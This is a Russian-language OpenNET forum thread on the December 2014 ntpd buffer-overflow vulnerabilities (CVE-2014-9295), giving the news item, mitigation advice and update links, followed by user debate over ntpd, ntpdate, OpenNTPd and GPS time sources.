The OpenNET Project / Index page

[ новости /+++ | форум | теги | ]

форумы  помощь  поиск  регистрация  майллист  вход/выход  слежка  RSS
"В ntpd выявлена уязвимость, которая может привести к удалённ..."
Вариант для распечатки  
Пред. тема | След. тема 
Форум Разговоры, обсуждение новостей
Изначальное сообщение [ Отслеживать ]

"В ntpd выявлена уязвимость, которая может привести к удалённ..."  +/
Сообщение от opennews (??) on 19-Дек-14, 22:25 
В демоне синхронизации точного времени ntpd 4.2.8 (http://support.ntp.org/bin/view/Main/SoftwareDownloads) устранены критические уязвимости (http://www.kb.cert.org/vuls/id/852879) (CVE-2014-9295 (https://access.redhat.com/security/cve/CVE-2014-9295)), вызванные ошибками,  приводящими к переполнению буфера в коде функций crypto_recv() (http://support.ntp.org/bin/view/Main/SecurityNotice#Buffer_o...), ctl_putdata() (http://support.ntp.org/bin/view/Main/SecurityNotice#Buffer_o...) и configure() (http://support.ntp.org/bin/view/Main/SecurityNotice#Buffer_o...). Отправив специальным образом оформленный пакет, злоумышленник может инициировать отказ в обслуживании или  организовать выполнение своего кода в системе с правами процесса ntpd, который обычно выполняется под пользователем ntp. Проблемы выявлены сотрудниками Google в процессе аудита кодовой базы ntpd.

Уязвимость в crypto_recv() проявляется при включении в ntp.conf режима  Autokey Authentication через директивы "crypto pw...". Для защиты следует отключить в конфигурации все директивы, начинающиеся со слова "crypto". При этом, так как аналогичные проблемы в ctl_putdata() и configure() проявляются при любой конфигурации, защититься от всех уязвимостей можно только обновив ntpd до версии 4.2.8 или установив патч.

В настоящее время обновлений пакетов с устранением проблемы не зафиксировано. Оценить появление обновлений в дистрибутивах можно на следующих страницах: openSUSE (http://lists.opensuse.org/opensuse-security-announce/), SLES (https://www.suse.com/support/update/),  Slackware (http://www.slackware.com/security/list.php?l=slackware-secur...), Gentoo (http://www.gentoo.org/security/en/index.xml), CentOS (http://lists.centos.org/pipermail/centos-announce/2014-Decem...), RHEL 6 (https://rhn.redhat.com/errata/rhel-server-6-errata.html), RHEL 7 (https://rhn.redhat.com/errata/rhel-server-7-errata.html), Ubuntu (http://www.ubuntu.com/usn/), Debian (https://lists.debian.org/debian-security-announce/2014/), Fedora (https://admin.fedoraproject.org/updates/F21), FreeBSD (http://www.vuxml.org/freebsd/), NetBSD (http://www.netbsd.org/support/security/).

Дополнение: поступили сведения о появлении в открытом доступа эксплоита. Рекомендуется срочно обновить ntpd.


URL: http://www.kb.cert.org/vuls/id/852879
Новость: http://www.opennet.me/opennews/art.shtml?num=41309

Ответить | Правка | Cообщить модератору

Оглавление

Сообщения по теме [Сортировка по времени | RSS]


1. "В ntpd выявлена уязвимость, которая может привести к удалённ..."  –9 +/
Сообщение от Аноним (??) on 19-Дек-14, 22:25 
Зачем оно надо когда есть cron + ntpdate ?
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

2. "В ntpd выявлена уязвимость, которая может привести к удалённ..."  +4 +/
Сообщение от Stax (ok) on 19-Дек-14, 22:39 
В качестве сервера?

А для случаев, когда сдвиг времени из-за ntpdate недопустим, и нужно плавно модифицировать время, как это делает обычный ntpd?

Ответить | Правка | ^ к родителю #1 | Наверх | Cообщить модератору

10. "В ntpd выявлена уязвимость, которая может привести к удалённ..."  –2 +/
Сообщение от Sw00p aka Jerom on 20-Дек-14, 02:19 
> В качестве сервера?
> А для случаев, когда сдвиг времени из-за ntpdate недопустим, и нужно плавно
> модифицировать время, как это делает обычный ntpd?

в качестве сервера таду уж ставь атомные часы и синхронизируйся по гпс


Ответить | Правка | ^ к родителю #2 | Наверх | Cообщить модератору

13. "В ntpd выявлена уязвимость, которая может привести к удалённ..."  +4 +/
Сообщение от Ordu email(ok) on 20-Дек-14, 05:25 
Угу. А вместо UPSа используйте собственную электростанцию.
Ответить | Правка | ^ к родителю #10 | Наверх | Cообщить модератору

17. "В ntpd выявлена уязвимость, которая может привести к удалённ..."  +/
Сообщение от Amnesiac on 20-Дек-14, 06:57 
> Угу. А вместо UPSа используйте собственную электростанцию.

А ведь UPS и нужен только для того, чтобы держать пока резервный генератор заводится с пол-оборота.

Ответить | Правка | ^ к родителю #13 | Наверх | Cообщить модератору

26. "В ntpd выявлена уязвимость, которая может привести к удалённ..."  +2 +/
Сообщение от Аноним (??) on 20-Дек-14, 11:57 
> резервный генератор

который питается от собственного НПЗ, которой перерабатывает нефть из собственной буровой. Т.е. собственная буровая под окном -- всенепременное условие отказоустойчивой работы сервиса.

Ответить | Правка | ^ к родителю #17 | Наверх | Cообщить модератору

28. "В ntpd выявлена уязвимость, которая может привести к удалённ..."  +2 +/
Сообщение от Аноним (??) on 20-Дек-14, 13:34 
Судя по тому, как вы ерничаете, вы, видимо, никогда не были в датацентрах. Нормальный датацентр действительно имеет собственную генераторную.
Ответить | Правка | ^ к родителю #26 | Наверх | Cообщить модератору

35. "В ntpd выявлена уязвимость, которая может привести к удалённ..."  +/
Сообщение от XoRe (ok) on 20-Дек-14, 16:42 
> Судя по тому, как вы ерничаете, вы, видимо, никогда не были в
> датацентрах. Нормальный датацентр действительно имеет собственную генераторную.

А вы, видимо, никогда не ловили внезапное выключение питания в ДЦ)

Ответить | Правка | ^ к родителю #28 | Наверх | Cообщить модератору

34. "В ntpd выявлена уязвимость, которая может привести к удалённ..."  +4 +/
Сообщение от XoRe (ok) on 20-Дек-14, 16:40 
>> резервный генератор
> который питается от собственного НПЗ, которой перерабатывает нефть из собственной буровой.
> Т.е. собственная буровая под окном -- всенепременное условие отказоустойчивой работы сервиса.

Нихрена вы тут условий наворотили...
А всего-то хотелось свой сайт с фоточками поднять.

Ответить | Правка | ^ к родителю #26 | Наверх | Cообщить модератору

68. "В ntpd выявлена уязвимость, которая может привести к удалённ..."  +/
Сообщение от daemontux on 21-Дек-14, 15:15 
>>> резервный генератор
>> который питается от собственного НПЗ, которой перерабатывает нефть из собственной буровой.
>> Т.е. собственная буровая под окном -- всенепременное условие отказоустойчивой работы сервиса.
> Нихрена вы тут условий наворотили...
> А всего-то хотелось свой сайт с фоточками поднять.

домашний сервачек для файлопомойки)

Ответить | Правка | ^ к родителю #34 | Наверх | Cообщить модератору

75. "В ntpd выявлена уязвимость, которая может привести к удалённ..."  +/
Сообщение от Аноним (??) on 21-Дек-14, 18:14 
> домашний сервачек для файлопомойки)

Взять платку на ARM, она от упс проработает почти как от электростанции :)

Ответить | Правка | ^ к родителю #68 | Наверх | Cообщить модератору

40. "В ntpd выявлена уязвимость, которая может привести к удалённ..."  +1 +/
Сообщение от Sw00p aka Jerom on 20-Дек-14, 22:03 
аааааа браток кажись Tier-1 в глаза не видел )))
Ответить | Правка | ^ к родителю #13 | Наверх | Cообщить модератору

56. "В ntpd выявлена уязвимость, которая может привести к удалённ..."  +1 +/
Сообщение от Ordu email(ok) on 21-Дек-14, 01:36 
> аааааа браток кажись Tier-1 в глаза не видел )))

Как бы это сказать... Тамбовский волк тебе браток. Со своими блатными замашками, иди лучше в падик пивка попей.

Ответить | Правка | ^ к родителю #40 | Наверх | Cообщить модератору

95. "В ntpd выявлена уязвимость, которая может привести к удалённ..."  –1 +/
Сообщение от Sw00p aka Jerom on 21-Дек-14, 19:35 
>> аааааа браток кажись Tier-1 в глаза не видел )))
> Как бы это сказать... Тамбовский волк тебе браток. Со своими блатными замашками,
> иди лучше в падик пивка попей.

жую попкорн, а ты слюни подотри

Ответить | Правка | ^ к родителю #56 | Наверх | Cообщить модератору

97. "В ntpd выявлена уязвимость, которая может привести к удалённ..."  +1 +/
Сообщение от Ordu email(ok) on 21-Дек-14, 21:29 
>>> аааааа браток кажись Tier-1 в глаза не видел )))
>> Как бы это сказать... Тамбовский волк тебе браток. Со своими блатными замашками,
>> иди лучше в падик пивка попей.
> жую попкорн, а ты слюни подотри

Если ты не справляешься со своими слюнями, то просто носи слюнявчик. Если не знаешь как его одеть, попроси маму. Ко мне же со столь интимными вопросами не стоит обращаться.

Ответить | Правка | ^ к родителю #95 | Наверх | Cообщить модератору

41. "В ntpd выявлена уязвимость, которая может привести к удалённ..."  –3 +/
Сообщение от Sw00p aka Jerom on 20-Дек-14, 22:05 
> Угу. А вместо UPSа используйте собственную электростанцию.

я посмотрю как вы ntp сервак поднимать в закрытой сети, где нет доступа к источникам точного времени

Ответить | Правка | ^ к родителю #13 | Наверх | Cообщить модератору

54. "В ntpd выявлена уязвимость, которая может привести к удалённ..."  +3 +/
Сообщение от Ordu email(ok) on 21-Дек-14, 01:35 
>> Угу. А вместо UPSа используйте собственную электростанцию.
> я посмотрю как вы ntp сервак поднимать в закрытой сети, где нет
> доступа к источникам точного времени

Дитятко, это довольно убогой демагогический приём: выбрать среди тысячи use-case'ов один, самый неприглядный для ntp, и после этого заявлять что ntp не нужен. Ты вообще математику посещаешь в школе или прогуливаешь напропалую? И если не прогуливаешь, то в каком же классе ты, что не въезжаешь во всю глубину тупости своего аргумента?

Ответить | Правка | ^ к родителю #41 | Наверх | Cообщить модератору

62. "В ntpd выявлена уязвимость, которая может привести к удалённ..."  +/
Сообщение от pavlinux (ok) on 21-Дек-14, 03:33 
Ну а теперь подумай, нах..я в изолированной сети точное время? Хватит времени сервера.
Часы есть на каждой маме, при правильном тюнинге (ajtimexconfig) за год уползают на минуту.
Ответить | Правка | ^ к родителю #41 | Наверх | Cообщить модератору
Часть нити удалена модератором

87. "В ntpd выявлена уязвимость, которая может привести к удалённ..."  +/
Сообщение от Аноним (??) on 21-Дек-14, 18:52 
> Я посмотрю, как ты SSL заставишь работать с такими часами.

Есть такая штука как tlsdate. Да, TLS умеет настолько дофига всего что до кучи через него еще и "сколько время?!" спросить можно.

Ответить | Правка | ^ к родителю #95 | Наверх | Cообщить модератору

103. "В ntpd выявлена уязвимость, которая может привести к удалённ..."  +/
Сообщение от Аноним (??) on 22-Дек-14, 14:45 
>> Я посмотрю, как ты SSL заставишь работать с такими часами.
> Есть такая штука как tlsdate. Да, TLS умеет настолько дофига всего что
> до кучи через него еще и "сколько время?!" спросить можно.

Это вы еще про htpdate не слышали.

Ответить | Правка | ^ к родителю #87 | Наверх | Cообщить модератору

92. "В ntpd выявлена уязвимость, которая может привести к удалённ..."  –1 +/
Сообщение от Sw00p aka Jerom on 21-Дек-14, 19:28 
павлин запел ну наконецто
Ответить | Правка | ^ к родителю #62 | Наверх | Cообщить модератору

76. "В ntpd выявлена уязвимость, которая может привести к удалённ..."  +/
Сообщение от Аноним (??) on 21-Дек-14, 18:20 
> доступа к источникам точного времени

А GPS и глонасс вас тоже забанили? В этих системах очень точное время. Свет штука быстрая и при плохой синхронизации времени система бы сильно врала в координатах.

На случае подляны - поставьте несколько приемников разных систем. И глонасс и гпс, а в перспективе и всякие европейские галилео и китайские байды - чем больше систем поддерживается тем менее вероятно что их все отключат или заглушат. Ну если уж надо - значит надо. Для пущей надежности можно алертить админа при разбеге на интервал более чем икс.

Ответить | Правка | ^ к родителю #41 | Наверх | Cообщить модератору

79. "В ntpd выявлена уязвимость, которая может привести к удалённ..."  –1 +/
Сообщение от pavel_simple (ok) on 21-Дек-14, 18:26 
>> доступа к источникам точного времени
> А GPS и глонасс вас тоже забанили? В этих системах очень точное
> время. Свет штука быстрая и при плохой синхронизации времени система бы
> сильно врала в координатах.
> На случае подляны - поставьте несколько приемников разных систем. И глонасс и
> гпс, а в перспективе и всякие европейские галилео и китайские байды
> - чем больше систем поддерживается тем менее вероятно что их все
> отключат или заглушат. Ну если уж надо - значит надо. Для
> пущей надежности можно алертить админа при разбеге на интервал более чем
> икс.

когда начнётся, работать не будет ни одна из них, правда тогда на синхронизацию времени на серверах а тем более клиентах , боюсь будет все глубоко посрать. спасибо за ваше ценное мнение, мы обязательно делаем оргвыводы.

Ответить | Правка | ^ к родителю #76 | Наверх | Cообщить модератору

89. "В ntpd выявлена уязвимость, которая может привести к удалённ..."  +/
Сообщение от Аноним (??) on 21-Дек-14, 18:56 
> когда начнётся, работать не будет ни одна из них,

Вот это не факт - системы рулятся совсем разными юрисдикциями и у них разные параметры. Чем больше систем - тем менее вероятно что завалятся все сразу. Обычная теория надежности.

Хотя если имелось в виду что начнется глобальная ядерная война - ну так и быть, я переживу в этих условиях и без идеально точного времени.

Ответить | Правка | ^ к родителю #79 | Наверх | Cообщить модератору

98. "В ntpd выявлена уязвимость, которая может привести к удалённ..."  +/
Сообщение от pavel_simple (ok) on 21-Дек-14, 21:33 

> Хотя если имелось в виду

непереживёшь и не надейся

Ответить | Правка | ^ к родителю #89 | Наверх | Cообщить модератору

93. "В ntpd выявлена уязвимость, которая может привести к удалённ..."  –1 +/
Сообщение от Sw00p aka Jerom on 21-Дек-14, 19:29 
>> доступа к источникам точного времени
> А GPS и глонасс вас тоже забанили? В этих системах очень точное
> время. Свет штука быстрая и при плохой синхронизации времени система бы
> сильно врала в координатах.
> На случае подляны - поставьте несколько приемников разных систем. И глонасс и
> гпс, а в перспективе и всякие европейские галилео и китайские байды
> - чем больше систем поддерживается тем менее вероятно что их все
> отключат или заглушат. Ну если уж надо - значит надо. Для
> пущей надежности можно алертить админа при разбеге на интервал более чем
> икс.

прочтите все мои коменты

Ответить | Правка | ^ к родителю #76 | Наверх | Cообщить модератору

16. "В ntpd выявлена уязвимость, которая может привести к удалённ..."  –2 +/
Сообщение от Amnesiac on 20-Дек-14, 06:55 
>> В качестве сервера?
>> А для случаев, когда сдвиг времени из-за ntpdate недопустим, и нужно плавно
>> модифицировать время, как это делает обычный ntpd?
> в качестве сервера таду уж ставь атомные часы и синхронизируйся по гпс

Если есть "атомные часы", нафига синхронизироваться по GPS?

Развелось школия.

Ответить | Правка | ^ к родителю #10 | Наверх | Cообщить модератору

25. "В ntpd выявлена уязвимость, которая может привести к удалённ..."  +/
Сообщение от Eugene Ryabtsev on 20-Дек-14, 11:26 
Вы, прежде чем чушь нести, поинтересовались бы стабильностью рубидия и требованиям к, скажем, PMU (http://en.wikipedia.org/wiki/Phasor_measurement_unit). Поясняю - разойдётся за месяц.
Ответить | Правка | ^ к родителю #16 | Наверх | Cообщить модератору

46. "В ntpd выявлена уязвимость, которая может привести к удалённ..."  +/
Сообщение от Аноним (??) on 20-Дек-14, 23:52 
> синхронизируйся по гпс

А потом США решат срубить немного лулзов и отправят неправильное время :).


Ответить | Правка | ^ к родителю #10 | Наверх | Cообщить модератору

59. "В ntpd выявлена уязвимость, которая может привести к удалённ..."  +/
Сообщение от Аноним (??) on 21-Дек-14, 01:40 
> А потом США решат срубить немного лулзов и отправят неправильное время :).

Задолбаются своих предупреждать, чтоб не велись.

Ответить | Правка | ^ к родителю #46 | Наверх | Cообщить модератору

77. "В ntpd выявлена уязвимость, которая может привести к удалённ..."  +/
Сообщение от Аноним (??) on 21-Дек-14, 18:25 
> Задолбаются своих предупреждать, чтоб не велись.

Так спутники над поверхностью планеты не стационарно висят - лулзы можно слать лишь при пролете над "дружественной" территорией. Коненчо врядли удастся обеспечить филигранную точность, но в целом некий простор для креативной правки параметров имеется.

Ответить | Правка | ^ к родителю #59 | Наверх | Cообщить модератору

104. "В ntpd выявлена уязвимость, которая может привести к удалённ..."  +1 +/
Сообщение от Дядя_Федор on 22-Дек-14, 15:02 
Вообще-то как раз стационарно. На геоцентрической орбите. Учите матчасть.
Ответить | Правка | ^ к родителю #77 | Наверх | Cообщить модератору

105. "В ntpd выявлена уязвимость, которая может привести к удалённ..."  +/
Сообщение от sukaslayer on 22-Дек-14, 22:59 
Таки не на геостационарной
http://upload.wikimedia.org/wikipedia/commons/9/9c/Constella...
Ответить | Правка | ^ к родителю #104 | Наверх | Cообщить модератору

3. "В ntpd выявлена уязвимость, которая может привести к удалённ..."  +/
Сообщение от Аноним (??) on 19-Дек-14, 22:47 
Вы определитесь, вам нужно точное время или приблизительное?
Ответить | Правка | ^ к родителю #1 | Наверх | Cообщить модератору

9. "В ntpd выявлена уязвимость, которая может привести к удалённ..."  +/
Сообщение от Sw00p aka Jerom on 20-Дек-14, 02:18 
The default polling value after restart of NTP is the value specified by minpoll. The default values for minpoll and maxpoll are 6 (64 seconds) and 10 (1024 seconds) respectively.

чем крон не ахти ?
и нет понятия приблизительное, даже синхронизация по крону это уже точное время

Ответить | Правка | ^ к родителю #3 | Наверх | Cообщить модератору

15. "В ntpd выявлена уязвимость, которая может привести к удалённ..."  +/
Сообщение от Amnesiac on 20-Дек-14, 06:54 
Администратору локалхоста хватит и ntpdate -b pool.ntp.org

А если нужно отдавать время 3000+ рабочих станций, серверов и прочих цисок, без ntpd не обойтись.

И да, у нас stratum 1 с GPS

Ответить | Правка | ^ к родителю #9 | Наверх | Cообщить модератору

42. "В ntpd выявлена уязвимость, которая может привести к удалённ..."  –1 +/
Сообщение от Sw00p aka Jerom on 20-Дек-14, 22:13 
> Администратору локалхоста хватит и ntpdate -b pool.ntp.org
> А если нужно отдавать время 3000+ рабочих станций, серверов и прочих цисок,
> без ntpd не обойтись.
> И да, у нас stratum 1 с GPS

поднять ntpd на 3000+ серверах или прописать на 3000+ строчек в крон на каждой машине - не одно и тоже ?

пс: паппет в помощь, базар ни о чём

Ответить | Правка | ^ к родителю #15 | Наверх | Cообщить модератору

63. "В ntpd выявлена уязвимость, которая может привести к удалённ..."  +4 +/
Сообщение от pavlinux (ok) on 21-Дек-14, 03:40 
>> Администратору локалхоста хватит и ntpdate -b pool.ntp.org
>> А если нужно отдавать время 3000+ рабочих станций, серверов и прочих цисок,
>> без ntpd не обойтись.
>> И да, у нас stratum 1 с GPS
> поднять ntpd на 3000+ серверах или прописать на 3000+ строчек в крон
> на каждой машине - не одно и тоже ?
> пс: паппет в помощь, базар ни о чём

Детский сад, чесслово. Какой нах... паппет, лохи. Видюзятнегов наползло.
На маршрутизаторе перехватаваете пакеты, маскарад, и направляете на свой сервак.
Все венды думают, что им время дал time-windows.com.
  

Ответить | Правка | ^ к родителю #42 | Наверх | Cообщить модератору

78. "В ntpd выявлена уязвимость, которая может привести к удалённ..."  –2 +/
Сообщение от Аноним (??) on 21-Дек-14, 18:26 
> Видюзятнегов наползло.

...
> Все венды думают, что им время дал time-windows.com.

Павлин сам себя обоcpaл? :)


Ответить | Правка | ^ к родителю #63 | Наверх | Cообщить модератору

96. "В ntpd выявлена уязвимость, которая может привести к удалённ..."  –1 +/
Сообщение от тигар (ok) on 21-Дек-14, 20:13 
>> Видюзятнегов наползло.
> ...
>> Все венды думают, что им время дал time-windows.com.
> Павлин сам себя обоcpaл? :)

просто показал что он менее тупой чем ты, например.

Ответить | Правка | ^ к родителю #78 | Наверх | Cообщить модератору

94. "В ntpd выявлена уязвимость, которая может привести к удалённ..."  –2 +/
Сообщение от Sw00p aka Jerom on 21-Дек-14, 19:31 
>>> Администратору локалхоста хватит и ntpdate -b pool.ntp.org
>>> А если нужно отдавать время 3000+ рабочих станций, серверов и прочих цисок,
>>> без ntpd не обойтись.
>>> И да, у нас stratum 1 с GPS
>> поднять ntpd на 3000+ серверах или прописать на 3000+ строчек в крон
>> на каждой машине - не одно и тоже ?
>> пс: паппет в помощь, базар ни о чём
>  Детский сад, чесслово. Какой нах... паппет, лохи. Видюзятнегов наползло.
> На маршрутизаторе перехватаваете пакеты, маскарад, и направляете на свой сервак.
> Все венды думают, что им время дал time-windows.com.

мелкософт заказал пиар

Ответить | Правка | ^ к родителю #63 | Наверх | Cообщить модератору

47. "В ntpd выявлена уязвимость, которая может привести к удалённ..."  –2 +/
Сообщение от Аноним (??) on 20-Дек-14, 23:53 
> без ntpd не обойтись.
> И да, у нас stratum 1 с GPS

Если уж на то пошло, есть openntpd. И клиент и сервер в мизерных размерах. И одна из полутора утилит из опенка которая оказалась мне полезной.

Ответить | Правка | ^ к родителю #15 | Наверх | Cообщить модератору

58. "В ntpd выявлена уязвимость, которая может привести к удалённ..."  +1 +/
Сообщение от Аноним (??) on 21-Дек-14, 01:40 
> Если уж на то пошло, есть openntpd. И клиент и сервер в
> мизерных размерах. И одна из полутора утилит из опенка которая оказалась
> мне полезной.

Вне опенка она уже давно заброшена.

Ответить | Правка | ^ к родителю #47 | Наверх | Cообщить модератору

69. "В ntpd выявлена уязвимость, которая может привести к удалённ..."  +/
Сообщение от daemontux on 21-Дек-14, 15:22 
>> Если уж на то пошло, есть openntpd. И клиент и сервер в
>> мизерных размерах. И одна из полутора утилит из опенка которая оказалась
>> мне полезной.
> Вне опенка она уже давно заброшен

+1
ставить openbsd ради ntpserver это маразм)

Ответить | Правка | ^ к родителю #58 | Наверх | Cообщить модератору

80. "В ntpd выявлена уязвимость, которая может привести к удалённ..."  –2 +/
Сообщение от Аноним (??) on 21-Дек-14, 18:30 
> ставить openbsd ради ntpserver это маразм)

Да вообще-то этот демон весом в ...цать кило чудно работает на пингвине. Я что, сильно похож на поклонника садомазо - с опенбздой сношаться? Он есть в репках например той же убунты, да и в дебиане не сильно древнем должен быть. Хотя программу такого размера можно и из сорцов собрать накрайняк - там зависимостей полторы штуки.

Ответить | Правка | ^ к родителю #69 | Наверх | Cообщить модератору

99. "В ntpd выявлена уязвимость, которая может привести к удалённ..."  +/
Сообщение от Аноним (??) on 22-Дек-14, 14:35 
> Да вообще-то этот демон весом в ...цать кило чудно работает на пингвине.

То, что работает на пингвине, имеет мало общего с openntpd из openbsd. Все-таки, за шесть лет многое поменялось.

Ответить | Правка | ^ к родителю #80 | Наверх | Cообщить модератору

21. "В ntpd выявлена уязвимость, которая может привести к удалённ..."  +3 +/
Сообщение от Sadok (ok) on 20-Дек-14, 09:36 
> Зачем оно надо когда есть cron + ntpdate ?

Затем. Например для билинга. Чтобы не было скачков в выставляемых счетах и не орали "<оператор> ворует бабло!!!"

Ответить | Правка | ^ к родителю #1 | Наверх | Cообщить модератору

29. "В ntpd выявлена уязвимость, которая может привести к удалённ..."  +/
Сообщение от Аноним (??) on 20-Дек-14, 13:48 
> Зачем оно надо когда есть cron + ntpdate ?

1. ntpdate is deprecated
2. ntpdate - это фактически ntpd (с очень небольшими изменениями), так что наверняка наследует его уязвимости.

Ответить | Правка | ^ к родителю #1 | Наверх | Cообщить модератору

44. "В ntpd выявлена уязвимость, которая может привести к удалённ..."  –2 +/
Сообщение от Sw00p aka Jerom on 20-Дек-14, 22:18 
>> Зачем оно надо когда есть cron + ntpdate ?
> 1. ntpdate is deprecated
> 2. ntpdate - это фактически ntpd (с очень небольшими изменениями), так что
> наверняка наследует его уязвимости.

ну и спрашивается зачем нужна уязвимая хрень которая висит в системе как демон и жрёт ресурсы ?
можно и по крону дёргать, чё такие все принципиальные ?

на одном вшивом сервере вариант с кроном самый раз

Ответить | Правка | ^ к родителю #29 | Наверх | Cообщить модератору

49. "В ntpd выявлена уязвимость, которая может привести к удалённ..."  +/
Сообщение от Аноним (??) on 20-Дек-14, 23:56 
> на одном вшивом сервере вариант с кроном самый раз

Скорее уж с openntpd. Который мизерный по размеру и потому кучи дыр в нем не ожидается.

Ответить | Правка | ^ к родителю #44 | Наверх | Cообщить модератору

60. "В ntpd выявлена уязвимость, которая может привести к удалённ..."  +1 +/
Сообщение от Аноним (??) on 21-Дек-14, 01:49 
> Скорее уж с openntpd. Который мизерный по размеру и потому кучи дыр в нем не ожидается.

Не очень доверяю коду, который уже шесть лет валяется забытым в сторонке (это я про "экспортную" версию openntpd). Даже если кода там 1800 строк (а это уже отнюдь не приветмир).

Ответить | Правка | ^ к родителю #49 | Наверх | Cообщить модератору

82. "В ntpd выявлена уязвимость, которая может привести к удалённ..."  –2 +/
Сообщение от Аноним (??) on 21-Дек-14, 18:32 
> (это я про "экспортную" версию openntpd). Даже если кода там 1800
> строк (а это уже отнюдь не приветмир).

Но и не такой переросток как сабж, где кода в разы больше. А как известно, больше кода - больше багов.

Ответить | Правка | ^ к родителю #60 | Наверх | Cообщить модератору

100. "В ntpd выявлена уязвимость, которая может привести к удалённ..."  +/
Сообщение от Аноним (??) on 22-Дек-14, 14:36 
> Но и не такой переросток как сабж, где кода в разы больше.
> А как известно, больше кода - больше багов.

Сабж хотя бы поддерживают, и устраняют дыры. А к портируемой версии openntpd уже шесть лет никто не прикасался.

Ответить | Правка | ^ к родителю #82 | Наверх | Cообщить модератору

53. "В ntpd выявлена уязвимость, которая может привести к удалённ..."  +/
Сообщение от Аноним (??) on 21-Дек-14, 01:31 
> ну и спрашивается зачем нужна уязвимая хрень которая висит в системе как демон и жрёт ресурсы ?
> можно и по крону дёргать, чё такие все принципиальные ?

Особенно забавляет ваша апелляция к "уязвимости". Вы таки думаете, что клиент, запущеный по крону и подключающийся к заведомо уязвимому (и, возможно, уже скомпрометированному) серверу позволит гарантированно обеспечить безопасность?

Ответить | Правка | ^ к родителю #44 | Наверх | Cообщить модератору

48. "В ntpd выявлена уязвимость, которая может привести к удалённ..."  +2 +/
Сообщение от Аноним (??) on 20-Дек-14, 23:56 
> Зачем оно надо когда есть cron + ntpdate ?

Действительно, зачем нужен карьерный самосвал? Можно возить руду мешками, в багажнике малолитражки.

Ответить | Правка | ^ к родителю #1 | Наверх | Cообщить модератору

66. "В ntpd выявлена уязвимость, которая может привести к удалённ..."  +1 +/
Сообщение от Куяврег on 21-Дек-14, 15:01 
руки поотрывать
Ответить | Правка | ^ к родителю #1 | Наверх | Cообщить модератору

4. "В ntpd выявлена уязвимость, которая может привести к удалённ..."  +7 +/
Сообщение от Аноним (??) on 19-Дек-14, 22:57 
Сколько лет ставлю везде OpenNTPd, и горя не знаю... Может, он не настолько клюквенно-развесистый, но задачи "синхронизировать время вот с этими серверами" и "дать синхронизироваться другим" выполняет без проблем, что в локалке, что в большой Сети.
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

57. "В ntpd выявлена уязвимость, которая может привести к удалённ..."  +1 +/
Сообщение от Аноним (??) on 21-Дек-14, 01:39 
> Сколько лет ставлю везде OpenNTPd, и горя не знаю... Может, он не
> настолько клюквенно-развесистый, но задачи "синхронизировать время вот с этими серверами"
> и "дать синхронизироваться другим" выполняет без проблем, что в локалке, что
> в большой Сети.

На официальном сайте проекта написано, что portable-версия (т.е. версия для ОС, отличных от OpenBSD), устарела и не поддерживается.

Похоже, разработчики опенка придерживаются того же подхода, что и Поттеринг - "будем пилить под свою любимую ось, а проблемы негров шерифа не интересуют".

Ответить | Правка | ^ к родителю #4 | Наверх | Cообщить модератору

83. "В ntpd выявлена уязвимость, которая может привести к удалённ..."  –2 +/
Сообщение от Аноним (??) on 21-Дек-14, 18:44 
> устарела и не поддерживается.

...но работает и каши не просит. И дыр в проге на ..цать кило как-то менее ожидаемо чем в переростке где кода суммарно чуть ли не мег.

> Похоже, разработчики опенка придерживаются того же подхода,

Да разработчики на самом деле все такие, только не все себе в этом честно признаются :)


Ответить | Правка | ^ к родителю #57 | Наверх | Cообщить модератору

101. "В ntpd выявлена уязвимость, которая может привести к удалённ..."  +/
Сообщение от Аноним (??) on 22-Дек-14, 14:38 
> ...но работает и каши не просит. И дыр в проге на ..цать
> кило как-то менее ожидаемо чем в переростке где кода суммарно чуть
> ли не мег.

Размер кода отличатся всего лишь в три раза.
А вот уровень поддержки - радикально.

С тем же успехом можно сказать, что и не обновленный ntpd "каши не просит". Ну правда, зачем его обновлять?

Ответить | Правка | ^ к родителю #83 | Наверх | Cообщить модератору

5. "В ntpd выявлена уязвимость, которая может привести к удалённ..."  +/
Сообщение от Сергей (??) on 19-Дек-14, 23:36 
Там ограниченное число используемых ip-ков, посему всегда использовал файер  
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

6. "В ntpd выявлена уязвимость, которая может привести к удалённ..."  +1 +/
Сообщение от Аноним (??) on 19-Дек-14, 23:51 
> поступили сведения о появлении в открытом доступе эксплоита

Эталонный экземпляр эксплойта хранится на Stratum-0 NTP-сервере ВНИИФТРИ.

Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

84. "В ntpd выявлена уязвимость, которая может привести к удалённ..."  +/
Сообщение от Аноним (??) on 21-Дек-14, 18:44 
> Эталонный экземпляр эксплойта хранится на Stratum-0 NTP-сервере ВНИИФТРИ.

А я то думал что на сервере парижской палаты мер и весов...

Ответить | Правка | ^ к родителю #6 | Наверх | Cообщить модератору

7. "В ntpd выявлена уязвимость, которая может привести к удалённ..."  +/
Сообщение от Аноним (??) on 20-Дек-14, 00:49 
Простите за оффтоп. Но напишу: люблю я почитать ваш сайт, чаще всего я делаю это с смартфона. Ну вот, решил я сегодня почитать новости, меня перекидывает на рекламу UC Browser, с текстом типа "Для просмотра этого сайта установите UC Browser". У меня у одного такая чертовщина?
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

11. "В ntpd выявлена уязвимость, которая может привести к удалённ..."  +1 +/
Сообщение от Sw00p aka Jerom on 20-Дек-14, 02:21 
> Простите за оффтоп. Но напишу: люблю я почитать ваш сайт, чаще всего
> я делаю это с смартфона. Ну вот, решил я сегодня почитать
> новости, меня перекидывает на рекламу UC Browser, с текстом типа "Для
> просмотра этого сайта установите UC Browser". У меня у одного такая
> чертовщина?

эт ваш провайдер )

пс: давно опеннету перейти на ссл

Ответить | Правка | ^ к родителю #7 | Наверх | Cообщить модератору

14. "В ntpd выявлена уязвимость, которая может привести к удалённ..."  –1 +/
Сообщение от Аноним (??) on 20-Дек-14, 05:37 
зачем opennet переходить на SSL?
Ответить | Правка | ^ к родителю #11 | Наверх | Cообщить модератору

43. "В ntpd выявлена уязвимость, которая может привести к удалённ..."  –2 +/
Сообщение от Sw00p aka Jerom on 20-Дек-14, 22:14 
> зачем opennet переходить на SSL?

чтоб вам хню всякого рода по дороге до вашего браузера не пихал

Ответить | Правка | ^ к родителю #14 | Наверх | Cообщить модератору

50. "В ntpd выявлена уязвимость, которая может привести к удалённ..."  +/
Сообщение от Аноним (??) on 20-Дек-14, 23:58 
> чтоб вам хню всякого рода по дороге до вашего браузера не пихал

